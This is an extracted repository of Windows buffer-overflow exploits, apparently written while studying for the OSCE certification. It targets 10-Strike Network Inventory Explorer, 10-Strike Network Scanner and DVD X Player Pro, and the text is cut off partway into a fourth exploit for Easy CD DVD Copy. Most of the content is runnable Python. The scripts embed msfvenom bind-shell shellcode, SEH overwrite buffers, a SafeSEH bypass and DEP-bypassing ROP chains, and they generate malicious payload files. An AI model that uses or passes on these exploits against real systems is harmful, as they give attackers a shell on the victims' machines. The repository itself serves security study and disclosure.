Repository: ihack4falafel/OSCE
Branch: master
Commit: c19500bd3934
Files: 37
Total size: 121.3 KB

Directory structure:
gitextract_ec6vv2vr/

├── Local Buffer Overflow/
│   ├── 10-StrikeNetworkInventoryExplorerv8.54/
│   │   ├── From Text File/
│   │   │   └── Exploit.py
│   │   ├── README.md
│   │   └── Registration Key/
│   │       └── Exploit.py
│   ├── 10-StrikeNetworkScannerv3.0/
│   │   ├── Exploit.py
│   │   └── README.md
│   ├── DVDXPlayerProv5.5/
│   │   ├── VirtualAlloc()/
│   │   │   └── Exploit.py
│   │   ├── VirtualProtect()/
│   │   │   └── Exploit.py
│   │   └── readme.md
│   ├── EasyCDDVDCopyv1.3.24/
│   │   ├── Exploit.py
│   │   └── readme.md
│   ├── EasyRMtoMP3Converterv2.7.3.700/
│   │   ├── Exploit.py
│   │   └── readme.md
│   ├── FTPShellServerv6.80/
│   │   ├── Exploit.py
│   │   └── README.md
│   ├── QuickZipv4.60.019/
│   │   ├── Egg Hunter/
│   │   │   └── Exploit.py
│   │   ├── OS Dependent/
│   │   │   └── Exploit.py
│   │   └── README.md
│   ├── SysGaugeProv4.6.12/
│   │   ├── Exploit.py
│   │   └── readme.md
│   ├── VUPlayerv2.49/
│   │   ├── Exploit.py
│   │   └── readme.md
│   └── Zip-n-Gov4.9/
│       ├── Exploit.py
│       └── README.md
├── README.md
├── Remote Buffer Overflow/
│   ├── EasyFileSharingWebServerv7.2/
│   │   ├── Exploit.py
│   │   └── readme.md
│   └── VulnServer/
│       ├── Bad Characters/
│       │   ├── Exploit.py
│       │   └── README.md
│       ├── CALL [REG]/
│       │   └── Exploit.py
│       ├── Egg Hunter/
│       │   ├── Exploit.py
│       │   └── README.md
│       ├── POP POP RETN/
│       │   └── Exploit.py
│       ├── SEH/
│       │   ├── Exploit.py
│       │   └── README.md
│       └── readme.md
└── Tools/
    ├── EggHunter.py
    └── FuzzMe.py

================================================
FILE CONTENTS
================================================

================================================
FILE: Local Buffer Overflow/10-StrikeNetworkInventoryExplorerv8.54/From Text File/Exploit.py
================================================
#!/usr/bin/python
#----------------------------------------------------------------------------------------------------------#
# Exploit Title      : 10-Strike Network Inventory Explorer Standard v8.54 - Local Buffer Overflow (SEH)   #
# Exploit Author     : Hashim Jawad - @ihack4falafel                                                       #
# Vendor Homepage    : https://www.10-strike.com/                                                          #
# Vulnerable Software: https://www.10-strike.com/networkinventoryexplorer/network-inventory-setup.exe      #
# Tested on          : Windows 7 Enterprise - SP1 (x86)                                                    #
#----------------------------------------------------------------------------------------------------------#

# Disclosure Timeline:
# ====================
# 06-02-18: Contacted vendor, no response 
# 06-03-18: Contacted vendor, no response
# 06-04-18: Contacted vendor, no response
# 06-05-18: Proof of concept exploit published 

'''
Steps to reproduce:
===================
 - Under Computers tab click on 'From Text File'
 - Open Evil.txt and boom!
Notes:
======
 - The following modules have no protection making the exploit universal: [sqlite3.dll, ssleay32.dll, MSVCR71.dll]
 - Next SEH offset is 211 bytes but for some reason passing the exception to the program will result in shifting 
   the stack by 8 bytes, see buffer for reference.
 - Keep in mind the exploit is contingent on path, and as such you need to make sure offsets stay intact based on 
   your username, the following is the path used while developing the exploit (default on Windows 7): 
   [C:\Users\IEUser\AppData\Roaming\10-strike\Network Inventory\cfg\]
 - Pro edition is effected as well.   
'''

#root@kali:~# msfvenom -p windows/shell_bind_tcp -b '\x00\x0a\x0d\x3a\x5c' -f python -v shellcode
#Payload size: 355 bytes
shellcode =  ""
shellcode += "\xba\x58\x39\xb1\xae\xd9\xcf\xd9\x74\x24\xf4\x5f"
shellcode += "\x29\xc9\xb1\x53\x83\xef\xfc\x31\x57\x0e\x03\x0f"
shellcode += "\x37\x53\x5b\x53\xaf\x11\xa4\xab\x30\x76\x2c\x4e"
shellcode += "\x01\xb6\x4a\x1b\x32\x06\x18\x49\xbf\xed\x4c\x79"
shellcode += "\x34\x83\x58\x8e\xfd\x2e\xbf\xa1\xfe\x03\x83\xa0"
shellcode += "\x7c\x5e\xd0\x02\xbc\x91\x25\x43\xf9\xcc\xc4\x11"
shellcode += "\x52\x9a\x7b\x85\xd7\xd6\x47\x2e\xab\xf7\xcf\xd3"
shellcode += "\x7c\xf9\xfe\x42\xf6\xa0\x20\x65\xdb\xd8\x68\x7d"
shellcode += "\x38\xe4\x23\xf6\x8a\x92\xb5\xde\xc2\x5b\x19\x1f"
shellcode += "\xeb\xa9\x63\x58\xcc\x51\x16\x90\x2e\xef\x21\x67"
shellcode += "\x4c\x2b\xa7\x73\xf6\xb8\x1f\x5f\x06\x6c\xf9\x14"
shellcode += "\x04\xd9\x8d\x72\x09\xdc\x42\x09\x35\x55\x65\xdd"
shellcode += "\xbf\x2d\x42\xf9\xe4\xf6\xeb\x58\x41\x58\x13\xba"
shellcode += "\x2a\x05\xb1\xb1\xc7\x52\xc8\x98\x8f\x97\xe1\x22"
shellcode += "\x50\xb0\x72\x51\x62\x1f\x29\xfd\xce\xe8\xf7\xfa"
shellcode += "\x31\xc3\x40\x94\xcf\xec\xb0\xbd\x0b\xb8\xe0\xd5"
shellcode += "\xba\xc1\x6a\x25\x42\x14\x06\x2d\xe5\xc7\x35\xd0"
shellcode += "\x55\xb8\xf9\x7a\x3e\xd2\xf5\xa5\x5e\xdd\xdf\xce"
shellcode += "\xf7\x20\xe0\xe1\x5b\xac\x06\x6b\x74\xf8\x91\x03"
shellcode += "\xb6\xdf\x29\xb4\xc9\x35\x02\x52\x81\x5f\x95\x5d"
shellcode += "\x12\x4a\xb1\xc9\x99\x99\x05\xe8\x9d\xb7\x2d\x7d"
shellcode += "\x09\x4d\xbc\xcc\xab\x52\x95\xa6\x48\xc0\x72\x36"
shellcode += "\x06\xf9\x2c\x61\x4f\xcf\x24\xe7\x7d\x76\x9f\x15"
shellcode += "\x7c\xee\xd8\x9d\x5b\xd3\xe7\x1c\x29\x6f\xcc\x0e"
shellcode += "\xf7\x70\x48\x7a\xa7\x26\x06\xd4\x01\x91\xe8\x8e"
shellcode += "\xdb\x4e\xa3\x46\x9d\xbc\x74\x10\xa2\xe8\x02\xfc"
shellcode += "\x13\x45\x53\x03\x9b\x01\x53\x7c\xc1\xb1\x9c\x57"
shellcode += "\x41\xc1\xd6\xf5\xe0\x4a\xbf\x6c\xb1\x16\x40\x5b"
shellcode += "\xf6\x2e\xc3\x69\x87\xd4\xdb\x18\x82\x91\x5b\xf1"
shellcode += "\xfe\x8a\x09\xf5\xad\xab\x1b"

buffer  = '\x41' * 207                           # filler to nSEH offset (211-4)
buffer += '\x9f\x4e\xe9\x61'                     # 0x61E94E9F [sqlite3.dll] | jmp esp
buffer += '\x90\x90\x90\x90'                     # nSEH
buffer += '\x90\x90\x90\x90'                     # SEH 
buffer += shellcode                              # bind shell 
buffer += '\xcc' * (3000-207-12-len(shellcode))  # junk 

try:
	f=open("Evil.txt","w")
	print "[+] Creating %s bytes evil payload.." %len(buffer)
	f.write(buffer)
	f.close()
	print "[+] File created!"
except Exception as e:
	print e

================================================
FILE: Local Buffer Overflow/10-StrikeNetworkInventoryExplorerv8.54/README.md
================================================
### 10-Strike Network Inventory Explorer 8.54
Structured Exception Handler (SEH) overwrite exploit found while studying for OSCE. See the link [EDB-ID: 44841](https://www.exploit-db.com/exploits/44838/) and [EDB-ID: 44840](https://www.exploit-db.com/exploits/44840/)

<p align="center">
  <img src="https://github.com/ihack4falafel/OSCE/blob/master/Local%20Buffer%20Overflow/10-StrikeNetworkInventoryExplorerv8.54/From%20Text%20File/PoC.gif">
</p>


================================================
FILE: Local Buffer Overflow/10-StrikeNetworkInventoryExplorerv8.54/Registration Key/Exploit.py
================================================
#!/usr/bin/python
#----------------------------------------------------------------------------------------------------------#
# Exploit Title      : 10-Strike Network Inventory Explorer Standard v8.54 - Local Buffer Overflow (SEH)   #
# Exploit Author     : Hashim Jawad - @ihack4falafel                                                       #
# Vendor Homepage    : https://www.10-strike.com/                                                          #
# Vulnerable Software: https://www.10-strike.com/networkinventoryexplorer/network-inventory-setup.exe      #
# Tested on          : Windows 7 Enterprise - SP1 (x86)                                                    #
#----------------------------------------------------------------------------------------------------------#

# Disclosure Timeline:
# ====================
# 06-02-18: Contacted vendor, no response 
# 06-03-18: Contacted vendor, no response
# 06-04-18: Contacted vendor, no response
# 06-05-18: Proof of concept exploit published 

'''
Steps to reproduce:
===================
 - Under Help, click 'Enter Registration Key'.  
 - Paste the contents of Evil.txt and click OK.
Notes:
======
 - The following modules have no protection making the exploit universal: [sqlite3.dll, ssleay32.dll, MSVCR71.dll]
 - There is ample space prior to SEH overwrite.
 - Pro edition is effected as well.
'''

#root@kali:~# msfvenom -p windows/shell_bind_tcp -b '\x00\x0a\x0d' -f python -v shellcode
#Payload size: 355 bytes
shellcode =  ""
shellcode += "\xbf\xad\xa8\x1e\x44\xdd\xc0\xd9\x74\x24\xf4\x5e"
shellcode += "\x2b\xc9\xb1\x53\x83\xc6\x04\x31\x7e\x0e\x03\xd3"
shellcode += "\xa6\xfc\xb1\xd7\x5f\x82\x3a\x27\xa0\xe3\xb3\xc2"
shellcode += "\x91\x23\xa7\x87\x82\x93\xa3\xc5\x2e\x5f\xe1\xfd"
shellcode += "\xa5\x2d\x2e\xf2\x0e\x9b\x08\x3d\x8e\xb0\x69\x5c"
shellcode += "\x0c\xcb\xbd\xbe\x2d\x04\xb0\xbf\x6a\x79\x39\xed"
shellcode += "\x23\xf5\xec\x01\x47\x43\x2d\xaa\x1b\x45\x35\x4f"
shellcode += "\xeb\x64\x14\xde\x67\x3f\xb6\xe1\xa4\x4b\xff\xf9"
shellcode += "\xa9\x76\x49\x72\x19\x0c\x48\x52\x53\xed\xe7\x9b"
shellcode += "\x5b\x1c\xf9\xdc\x5c\xff\x8c\x14\x9f\x82\x96\xe3"
shellcode += "\xdd\x58\x12\xf7\x46\x2a\x84\xd3\x77\xff\x53\x90"
shellcode += "\x74\xb4\x10\xfe\x98\x4b\xf4\x75\xa4\xc0\xfb\x59"
shellcode += "\x2c\x92\xdf\x7d\x74\x40\x41\x24\xd0\x27\x7e\x36"
shellcode += "\xbb\x98\xda\x3d\x56\xcc\x56\x1c\x3f\x21\x5b\x9e"
shellcode += "\xbf\x2d\xec\xed\x8d\xf2\x46\x79\xbe\x7b\x41\x7e"
shellcode += "\xc1\x51\x35\x10\x3c\x5a\x46\x39\xfb\x0e\x16\x51"
shellcode += "\x2a\x2f\xfd\xa1\xd3\xfa\x68\xa9\x72\x55\x8f\x54"
shellcode += "\xc4\x05\x0f\xf6\xad\x4f\x80\x29\xcd\x6f\x4a\x42"
shellcode += "\x66\x92\x75\x7d\x2b\x1b\x93\x17\xc3\x4d\x0b\x8f"
shellcode += "\x21\xaa\x84\x28\x59\x98\xbc\xde\x12\xca\x7b\xe1"
shellcode += "\xa2\xd8\x2b\x75\x29\x0f\xe8\x64\x2e\x1a\x58\xf1"
shellcode += "\xb9\xd0\x09\xb0\x58\xe4\x03\x22\xf8\x77\xc8\xb2"
shellcode += "\x77\x64\x47\xe5\xd0\x5a\x9e\x63\xcd\xc5\x08\x91"
shellcode += "\x0c\x93\x73\x11\xcb\x60\x7d\x98\x9e\xdd\x59\x8a"
shellcode += "\x66\xdd\xe5\xfe\x36\x88\xb3\xa8\xf0\x62\x72\x02"
shellcode += "\xab\xd9\xdc\xc2\x2a\x12\xdf\x94\x32\x7f\xa9\x78"
shellcode += "\x82\xd6\xec\x87\x2b\xbf\xf8\xf0\x51\x5f\x06\x2b"
shellcode += "\xd2\x6f\x4d\x71\x73\xf8\x08\xe0\xc1\x65\xab\xdf"
shellcode += "\x06\x90\x28\xd5\xf6\x67\x30\x9c\xf3\x2c\xf6\x4d"
shellcode += "\x8e\x3d\x93\x71\x3d\x3d\xb6"

buffer  = '\x41' * 4188                                # filler to nSEH
buffer += '\x75\x06\x74\x06'                           # nSEH | jump net
buffer += '\x7a\x49\xe8\x61'                           # SEH  | 0x61e8497a : pop esi # pop edi # ret | [sqlite3.dll]
buffer += '\x90' * 8                                   # nops
buffer += shellcode                                    # bind shell
buffer += '\x41' * (5000-4188-16-len(shellcode))       # junk

try:
	f=open("Evil.txt","w")
	print "[+] Creating %s bytes evil payload.." %len(buffer)
	f.write(buffer)
	f.close()
	print "[+] File created!"
except Exception as e:
	print e

================================================
FILE: Local Buffer Overflow/10-StrikeNetworkScannerv3.0/Exploit.py
================================================
#!/usr/bin/python
#----------------------------------------------------------------------------------------------------------#
# Exploit Title      : 10-Strike Network Scanner v3.0 - Local Buffer Overflow (SEH)                        #
# Exploit Author     : Hashim Jawad - @ihack4falafel                                                       #
# Vendor Homepage    : https://www.10-strike.com/                                                          #
# Vulnerable Software: https://www.10-strike.com/network-scanner/network-scanner.exe                       #
# Tested on          : Windows XP Professional - SP3 (x86)                                                 #
#----------------------------------------------------------------------------------------------------------#

# Disclosure Timeline:
# ====================
# 06-02-18: Contacted vendor, no response 
# 06-03-18: Contacted vendor, no response
# 06-04-18: Contacted vendor, no response
# 06-05-18: Proof of concept exploit published 

'''
Steps to reproduce:
===================
 - Copy contents of Evil.txt and paste in 'Host name or address' field under Add host.
 - Right-click on newly created host and click 'Trace route...'.
 - Repeat the second step and boom.
Notes:
======
 - '\x00' get converted to '\x20' by the program eliminating the possibility of using [pop, pop, retn] pointers in base binary.
 - All loaded modules are compiled with /SafeSEH.
 - Right-click on newly created host and click 'System information>General' is effected by the same vulnerability with different
   offsets and buffer size.
'''

#root@kali:~# msfvenom -p windows/shell_bind_tcp -b '\x00\x0a\x0d' -v shellcode -f python
#Payload size: 355 bytes
shellcode =  ""
shellcode += "\xb8\x2b\x29\xa7\x48\xd9\xe8\xd9\x74\x24\xf4\x5b"
shellcode += "\x29\xc9\xb1\x53\x31\x43\x12\x03\x43\x12\x83\xc0"
shellcode += "\xd5\x45\xbd\xea\xce\x08\x3e\x12\x0f\x6d\xb6\xf7"
shellcode += "\x3e\xad\xac\x7c\x10\x1d\xa6\xd0\x9d\xd6\xea\xc0"
shellcode += "\x16\x9a\x22\xe7\x9f\x11\x15\xc6\x20\x09\x65\x49"
shellcode += "\xa3\x50\xba\xa9\x9a\x9a\xcf\xa8\xdb\xc7\x22\xf8"
shellcode += "\xb4\x8c\x91\xec\xb1\xd9\x29\x87\x8a\xcc\x29\x74"
shellcode += "\x5a\xee\x18\x2b\xd0\xa9\xba\xca\x35\xc2\xf2\xd4"
shellcode += "\x5a\xef\x4d\x6f\xa8\x9b\x4f\xb9\xe0\x64\xe3\x84"
shellcode += "\xcc\x96\xfd\xc1\xeb\x48\x88\x3b\x08\xf4\x8b\xf8"
shellcode += "\x72\x22\x19\x1a\xd4\xa1\xb9\xc6\xe4\x66\x5f\x8d"
shellcode += "\xeb\xc3\x2b\xc9\xef\xd2\xf8\x62\x0b\x5e\xff\xa4"
shellcode += "\x9d\x24\x24\x60\xc5\xff\x45\x31\xa3\xae\x7a\x21"
shellcode += "\x0c\x0e\xdf\x2a\xa1\x5b\x52\x71\xae\xa8\x5f\x89"
shellcode += "\x2e\xa7\xe8\xfa\x1c\x68\x43\x94\x2c\xe1\x4d\x63"
shellcode += "\x52\xd8\x2a\xfb\xad\xe3\x4a\xd2\x69\xb7\x1a\x4c"
shellcode += "\x5b\xb8\xf0\x8c\x64\x6d\x6c\x84\xc3\xde\x93\x69"
shellcode += "\xb3\x8e\x13\xc1\x5c\xc5\x9b\x3e\x7c\xe6\x71\x57"
shellcode += "\x15\x1b\x7a\x46\xba\x92\x9c\x02\x52\xf3\x37\xba"
shellcode += "\x90\x20\x80\x5d\xea\x02\xb8\xc9\xa3\x44\x7f\xf6"
shellcode += "\x33\x43\xd7\x60\xb8\x80\xe3\x91\xbf\x8c\x43\xc6"
shellcode += "\x28\x5a\x02\xa5\xc9\x5b\x0f\x5d\x69\xc9\xd4\x9d"
shellcode += "\xe4\xf2\x42\xca\xa1\xc5\x9a\x9e\x5f\x7f\x35\xbc"
shellcode += "\x9d\x19\x7e\x04\x7a\xda\x81\x85\x0f\x66\xa6\x95"
shellcode += "\xc9\x67\xe2\xc1\x85\x31\xbc\xbf\x63\xe8\x0e\x69"
shellcode += "\x3a\x47\xd9\xfd\xbb\xab\xda\x7b\xc4\xe1\xac\x63"
shellcode += "\x75\x5c\xe9\x9c\xba\x08\xfd\xe5\xa6\xa8\x02\x3c"
shellcode += "\x63\xd8\x48\x1c\xc2\x71\x15\xf5\x56\x1c\xa6\x20"
shellcode += "\x94\x19\x25\xc0\x65\xde\x35\xa1\x60\x9a\xf1\x5a"
shellcode += "\x19\xb3\x97\x5c\x8e\xb4\xbd"

magic  = '\xd9\xee'                             # fldz
magic += '\xd9\x74\x24\xf4'                     # fnstenv [esp-0xc]
magic += '\x59'                                 # pop ecx
magic += '\x80\xc1\x05'                         # add cl,0x5
magic += '\x80\xc1\x05'                         # add cl,0x5
magic += '\x90'                                 # nop
magic += '\xfe\xcd'                             # dec ch
magic += '\xfe\xcd'                             # dec ch
magic += '\xff\xe1'                             # jmp ecx 

buffer  = '\x90' * 28                           # nops
buffer += shellcode                             # bind shell
buffer += '\xcc' * (516-28-len(shellcode))      # filler to nSEH 
buffer += '\x75\x06\x74\x06'                    # nSEH | jump net
buffer += '\x18\x05\xfc\x7f'                    # SEH  | 0x7ffc0518 : pop edi # pop edi # ret  [SafeSEH Bypass]
buffer += '\x90' * 5                            # nops 
buffer += magic                                 # jump -512
buffer += '\xcc' * (3000-516-4-4-5-len(magic))  # junk

try:
	f=open("Evil.txt","w")
	print "[+] Creating %s bytes evil payload.." %len(buffer)
	f.write(buffer)
	f.close()
	print "[+] File created!"
except Exception as e:
	print e

================================================
FILE: Local Buffer Overflow/10-StrikeNetworkScannerv3.0/README.md
================================================
### 10-Strike Network Scanner v3.0
Structured Exception Handler (SEH) overwrite exploit found while studying for OSCE. See the link [EDB-ID: 44841](https://www.exploit-db.com/exploits/44841/)

<p align="center">
  <img src="https://github.com/ihack4falafel/OSCE/blob/master/Local%20Buffer%20Overflow/10-StrikeNetworkScannerv3.0/PoC.gif">
</p>


================================================
FILE: Local Buffer Overflow/DVDXPlayerProv5.5/VirtualAlloc()/Exploit.py
================================================
#!/usr/bin/env python

import struct
import time

# bad characters "\x00\x0a\x0d\x1a\x20"

shellcode  = ""
shellcode += "\xba\xad\xe1\xd9\x21\xda\xd8\xd9\x74\x24\xf4\x5e\x33"
shellcode += "\xc9\xb1\x31\x83\xee\xfc\x31\x56\x0f\x03\x56\xa2\x03"
shellcode += "\x2c\xdd\x54\x41\xcf\x1e\xa4\x26\x59\xfb\x95\x66\x3d"
shellcode += "\x8f\x85\x56\x35\xdd\x29\x1c\x1b\xf6\xba\x50\xb4\xf9"
shellcode += "\x0b\xde\xe2\x34\x8c\x73\xd6\x57\x0e\x8e\x0b\xb8\x2f"
shellcode += "\x41\x5e\xb9\x68\xbc\x93\xeb\x21\xca\x06\x1c\x46\x86"
shellcode += "\x9a\x97\x14\x06\x9b\x44\xec\x29\x8a\xda\x67\x70\x0c"
shellcode += "\xdc\xa4\x08\x05\xc6\xa9\x35\xdf\x7d\x19\xc1\xde\x57"
shellcode += "\x50\x2a\x4c\x96\x5d\xd9\x8c\xde\x59\x02\xfb\x16\x9a"
shellcode += "\xbf\xfc\xec\xe1\x1b\x88\xf6\x41\xef\x2a\xd3\x70\x3c"
shellcode += "\xac\x90\x7e\x89\xba\xff\x62\x0c\x6e\x74\x9e\x85\x91"
shellcode += "\x5b\x17\xdd\xb5\x7f\x7c\x85\xd4\x26\xd8\x68\xe8\x39"
shellcode += "\x83\xd5\x4c\x31\x29\x01\xfd\x18\x27\xd4\x73\x27\x05"
shellcode += "\xd6\x8b\x28\x39\xbf\xba\xa3\xd6\xb8\x42\x66\x93\x37"
shellcode += "\x09\x2b\xb5\xdf\xd4\xb9\x84\xbd\xe6\x17\xca\xbb\x64"
shellcode += "\x92\xb2\x3f\x74\xd7\xb7\x04\x32\x0b\xc5\x15\xd7\x2b"
shellcode += "\x7a\x15\xf2\x4f\x1d\x85\x9e\xa1\xb8\x2d\x04\xbe"

buffer  = "\x41" * 260                      # eip offset

#----------------------------------------#
# ROP Chain setup for VirtualAlloc()     #
#----------------------------------------#
# EAX = NOP (0x90909090)                 #
# ECX = flProtect (0x40)                 #
# EDX = flAllocationType (0x1000)        #
# EBX = dwSize                           #
# ESP = lpAddress (automatic)            #
# EBP = ReturnTo (ptr to jmp esp)        # 
# ESI = ptr to VirtualAlloc()            #
# EDI = ROP NOP (RETN)                   #
#----------------------------------------#
 
buffer += struct.pack('<L', 0x6033cda2)      # POP EAX # RETN [Configuration.dll] 
buffer += "MMMM"                             # compensate (filler)
buffer += "MMMM"                             # compensate (filler)
buffer += "WWWW"                             # compensate (filler)
buffer += "WWWW"                             # compensate (filler)
buffer += struct.pack('<L', 0x603662fc)      # ptr to &VirtualAlloc() [IAT Configuration.dll]
buffer += struct.pack('<L', 0x6410b24d)      # MOV EAX,DWORD PTR DS:[EAX] # RETN [NetReg.dll] 
buffer += struct.pack('<L', 0x616385d8)      # XCHG EAX,ESI # RETN 0x00 [EPG.dll] 
buffer += struct.pack('<L', 0x61626545)      # POP EBP # RETN [EPG.dll] 
buffer += struct.pack('<L', 0x6035453b)      # & push esp # ret 0x10 [Configuration.dll]
buffer += struct.pack('<L', 0x64022e0f)      # POP EAX # RETN [MediaPlayerCtrl.dll]
buffer += struct.pack('<L', 0xfffffaff)      # value to negate, will become 0x00000501
buffer += struct.pack('<L', 0x64037950)      # NEG EAX # RETN [MediaPlayerCtrl.dll]
buffer += struct.pack('<L', 0x61640124)      # XCHG EAX,EBX # RETN [EPG.dll] 
buffer += struct.pack('<L', 0x64022e0f)      # POP EAX # RETN [MediaPlayerCtrl.dll]
buffer += struct.pack('<L', 0xffffffc0)      # value to negate, will become 0x00000040
buffer += struct.pack('<L', 0x64037950)      # NEG EAX # RETN [MediaPlayerCtrl.dll]
buffer += struct.pack('<L', 0x60366fe4)      # XCHG EAX,ECX # RETN [Configuration.dll]
buffer += struct.pack('<L', 0x64022e0f)      # POP EAX # RETN [MediaPlayerCtrl.dll]
buffer += struct.pack('<L', 0xffffefff)      # value to negate, will become 0x00001000
buffer += struct.pack('<L', 0x61628105)      # INC EAX # RETN [EPG.dll]
buffer += struct.pack('<L', 0x64037950)      # NEG EAX # RETN [MediaPlayerCtrl.dll]
buffer += struct.pack('<L', 0x61608ba2)      # XCHG EAX,EDX # RETN [EPG.dll]
buffer += struct.pack('<L', 0x6162c3b0)      # POP EDI # RETN [EPG.dll] 
buffer += struct.pack('<L', 0x64041804)      # RETN (ROP NOP) [MediaPlayerCtrl.dll]
buffer += struct.pack('<L', 0x640390d3)      # POP EAX # RETN [MediaPlayerCtrl.dll] 
buffer += struct.pack('<L', 0x90909090)      # NOP
buffer += struct.pack('<L', 0x60358d9f)      # PUSHAD # RETN [Configuration.dll]
 
buffer += "\x90" * 20
buffer += shellcode
buffer += "\x90" * 20
buffer += "\x43" * (1500-260-(4*28)-40-len(shellcode))

try:
	f=open("OpenMe.plf","w")
	print "[+] Creating %s bytes evil payload.." %len(buffer)
	time.sleep(1)
	f.write(buffer)
	f.close()
	print "[+] File created. Load that shit up!"
except:
	print "File cannot be created"

================================================
FILE: Local Buffer Overflow/DVDXPlayerProv5.5/VirtualProtect()/Exploit.py
================================================
#!/usr/bin/env python

import struct
import time

# bad characters "\x00\x0a\x0d\x1a\x20"

shellcode  = ""
shellcode += "\xba\xad\xe1\xd9\x21\xda\xd8\xd9\x74\x24\xf4\x5e\x33"
shellcode += "\xc9\xb1\x31\x83\xee\xfc\x31\x56\x0f\x03\x56\xa2\x03"
shellcode += "\x2c\xdd\x54\x41\xcf\x1e\xa4\x26\x59\xfb\x95\x66\x3d"
shellcode += "\x8f\x85\x56\x35\xdd\x29\x1c\x1b\xf6\xba\x50\xb4\xf9"
shellcode += "\x0b\xde\xe2\x34\x8c\x73\xd6\x57\x0e\x8e\x0b\xb8\x2f"
shellcode += "\x41\x5e\xb9\x68\xbc\x93\xeb\x21\xca\x06\x1c\x46\x86"
shellcode += "\x9a\x97\x14\x06\x9b\x44\xec\x29\x8a\xda\x67\x70\x0c"
shellcode += "\xdc\xa4\x08\x05\xc6\xa9\x35\xdf\x7d\x19\xc1\xde\x57"
shellcode += "\x50\x2a\x4c\x96\x5d\xd9\x8c\xde\x59\x02\xfb\x16\x9a"
shellcode += "\xbf\xfc\xec\xe1\x1b\x88\xf6\x41\xef\x2a\xd3\x70\x3c"
shellcode += "\xac\x90\x7e\x89\xba\xff\x62\x0c\x6e\x74\x9e\x85\x91"
shellcode += "\x5b\x17\xdd\xb5\x7f\x7c\x85\xd4\x26\xd8\x68\xe8\x39"
shellcode += "\x83\xd5\x4c\x31\x29\x01\xfd\x18\x27\xd4\x73\x27\x05"
shellcode += "\xd6\x8b\x28\x39\xbf\xba\xa3\xd6\xb8\x42\x66\x93\x37"
shellcode += "\x09\x2b\xb5\xdf\xd4\xb9\x84\xbd\xe6\x17\xca\xbb\x64"
shellcode += "\x92\xb2\x3f\x74\xd7\xb7\x04\x32\x0b\xc5\x15\xd7\x2b"
shellcode += "\x7a\x15\xf2\x4f\x1d\x85\x9e\xa1\xb8\x2d\x04\xbe"

buffer  = "\x41" * 260                      # eip offset

#----------------------------------------#
# ROP Chain setup for VirtualProtect()   #
#----------------------------------------#
# EAX = NOP (0x90909090)                 #
# ECX = lpOldProtect (ptr to W address)  #
# EDX = NewProtect (0x40)                #
# EBX = dwSize                           #
# ESP = lPAddress (automatic)            #
# EBP = ReturnTo (ptr to jmp esp)        # 
# ESI = ptr to VirtualProtect()          #
# EDI = ROP NOP (RETN)                   # 
#----------------------------------------#
 
buffer += struct.pack('<L', 0x6033cda2)      # POP EAX # RETN [Configuration.dll] 
buffer += "MMMM"                             # compensate (filler)
buffer += "MMMM"                             # compensate (filler)
buffer += "WWWW"                             # compensate (filler)
buffer += "WWWW"                             # compensate (filler)
buffer += struct.pack('<L', 0x60366238)      # ptr to &VirtualProtect() [IAT Configuration.dll]
buffer += struct.pack('<L', 0x6410b24d)      # MOV EAX,DWORD PTR DS:[EAX] # RETN [NetReg.dll] 
buffer += struct.pack('<L', 0x616385d8)      # XCHG EAX,ESI # RETN 0x00 [EPG.dll] 
buffer += struct.pack('<L', 0x61626545)      # POP EBP # RETN [EPG.dll] 
buffer += struct.pack('<L', 0x6035453b)      # & push esp # ret 0x10 [Configuration.dll]
buffer += struct.pack('<L', 0x64022e0f)      # POP EAX # RETN [MediaPlayerCtrl.dll]
buffer += struct.pack('<L', 0xfffffaff)      # value to negate, will become 0x00000501
buffer += struct.pack('<L', 0x64037950)      # NEG EAX # RETN [MediaPlayerCtrl.dll]
buffer += struct.pack('<L', 0x61640124)      # XCHG EAX,EBX # RETN [EPG.dll] 
buffer += struct.pack('<L', 0x64022e0f)      # POP EAX # RETN [MediaPlayerCtrl.dll]
buffer += struct.pack('<L', 0xffffffc0)      # value to negate, will become 0x00000040
buffer += struct.pack('<L', 0x64037950)      # NEG EAX # RETN [MediaPlayerCtrl.dll]
buffer += struct.pack('<L', 0x61608ba2)      # XCHG EAX,EDX # RETN [EPG.dll]
buffer += struct.pack('<L', 0x603636a4)      # POP ECX # RETN [Configuration.dll] 
buffer += struct.pack('<L', 0x6411cdfc)      # &Writable location [NetReg.dll]
buffer += struct.pack('<L', 0x6162c3b0)      # POP EDI # RETN [EPG.dll] 
buffer += struct.pack('<L', 0x64041804)      # RETN (ROP NOP) [MediaPlayerCtrl.dll]
buffer += struct.pack('<L', 0x640390d3)      # POP EAX # RETN [MediaPlayerCtrl.dll] 
buffer += struct.pack('<L', 0x90909090)      # NOP
buffer += struct.pack('<L', 0x60358d9f)      # PUSHAD # RETN [Configuration.dll]
 
buffer += "\x90" * 20
buffer += shellcode
buffer += "\x90" * 20
buffer += "\x43" * (1500-260-(4*25)-40-len(shellcode))

try:
	f=open("OpenMe.plf","w")
	print "[+] Creating %s bytes evil payload.." %len(buffer)
	time.sleep(1)
	f.write(buffer)
	f.close()
	print "[+] File created. Load that shit up!"
except:
	print "File cannot be created"

================================================
FILE: Local Buffer Overflow/DVDXPlayerProv5.5/readme.md
================================================
### DVD X Player Pro v5.5
Local Buffer Overflow exploit with DEP bypass (ROP gadgets) using VirtualAlloc() & VirtualProtect() APIs.

![alt text](https://github.com/ihack4falafel/OSCE/blob/master/Local%20Buffer%20Overflow/DVDXPlayerProv5.5/PoC.jpg)


================================================
FILE: Local Buffer Overflow/EasyCDDVDCopyv1.3.24/Exploit.py
================================================
#!/usr/bin/python
###############################################################################
# Exploit Title      : Easy CD DVD Copy v1.3.24 - Local Buffer Overflow (SEH) #
# Exploit Author     : Hashim Jawad                                           #
# Twitter            : @ihack4falafel                                         # 
# Author Website     : ihack4falafel[.]com                                    #
# Vendor Homepage    : http://www.divxtodvd.net/index.htm                     #
# Vulnerable Software: http://www.divxtodvd.net/easy_cd_dvd_copy.exe          #
# Tested on OS       : Windows XP professional SP3   - (996 bytes offset)     #
#                      Windows 7  Enterprise   SP1   - (1008 bytes offset)    #   
#                      Windows 10 Professional 64bit - (988 bytes offset)     #
# Steps to reproduce :                                                        #
#                     ~ Copy the content of OpenMe.txt                        #
#                     ~ Click on Register                                     #
#                     ~ Paste content in "Enter User Name" field              #
###############################################################################

import struct

#root@kali:~# msfvenom -p windows/exec CMD=calc.exe -b "\x00" -f python -v shellcode (220 bytes)

shellcode =  ""
shellcode += "\xbf\xc6\xde\x94\x3e\xda\xd0\xd9\x74\x24\xf4\x5d"
shellcode += "\x31\xc9\xb1\x31\x31\x7d\x13\x03\x7d\x13\x83\xc5"
shellcode += "\xc2\x3c\x61\xc2\x22\x42\x8a\x3b\xb2\x23\x02\xde"
